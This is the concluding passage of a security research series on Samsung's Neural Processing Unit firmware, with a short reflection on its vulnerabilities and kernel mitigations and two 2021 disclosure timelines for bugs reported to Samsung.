<2>[ 7717.707365]  [2:  npu-proto_AST:23209] SMP: stopping secondary CPUs : SYSTEM_RUNNING


This short article concludes this series about Samsung's Neural Processing Unit implementation. This journey started from an opaque binary embedded inside Samsung's firmwares and ended with an in-depth understanding of this component as well as primitives that could be used in a privilege escalation exploit (although we're pretty far away from an actual LPE).

It's very likely that there are multiple bugs still lurking in the codebase of the NPU, especially in functions handling machine learning computations since they are pretty complex and handle a lot of user inputs. The lack of security mitigations also makes any exploitation trivial. Thankfully, the kernel does implement mitigations and has limited interactions with the NPU, which greatly reduces the chances of a successful kernel compromise from the NPU.



  • Jan. 30, 2021 - Initial report sent to Samsung.
  • Feb. 01, 2021 - A Security Analyst is assigned to the issue.
  • Mar. 03, 2021 - Vulnerability is confirmed.
  • May 07, 2021 - Notification that a security update patching the vulnerability has been released and the issue can now be closed.


  • Mar. 15, 2021 - Initial report sent to Samsung.
  • Mar. 16, 2021 - A Security Analyst is assigned to the issue.
  • Mar. 18, 2021 - Samsung asks for clarifications regarding the permissions needed to reach the bug.
  • Apr. 05, 2021 - Details on the permissions required sent to Samsung.
  • Apr. 14, 2021 - Vulnerability is confirmed.
  • Jul. 19, 2021 - Notification that a security update patching the vulnerability has been released and the issue can now be closed.